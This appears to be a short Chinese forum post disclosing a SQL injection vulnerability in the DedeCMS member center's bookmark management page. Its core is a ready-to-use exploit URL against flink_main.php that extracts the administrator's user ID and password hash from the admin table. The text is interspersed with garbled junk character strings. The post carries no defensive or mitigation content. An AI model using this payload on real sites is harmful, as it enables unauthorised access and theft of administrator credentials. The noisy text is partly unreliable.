DedeCMS会员中心SQL注射漏洞, G. @5 e/ d1 F/ q0 d
需要magic_quotes_gpc = Off
2 e) ^. ^2 y: {# d; D1 @ \; A会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
* L" @% h7 O5 ~1 g5 a
+ |9 ^) z- ~. p! `% ODedeCMS会员中心书签管理SQL注射漏洞7 f. u0 ?! A( u& `% B
成功利用该漏洞可获得管理员密码. \$ b% j: m( H( x7 R, v5 w
/ X; l# e9 [, b' S会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
. v8 ]+ r: {6 A# F8 L$ H- `
/ x* Z- m1 [# C2 Shttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
& r9 I2 f! S }5 [" K |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59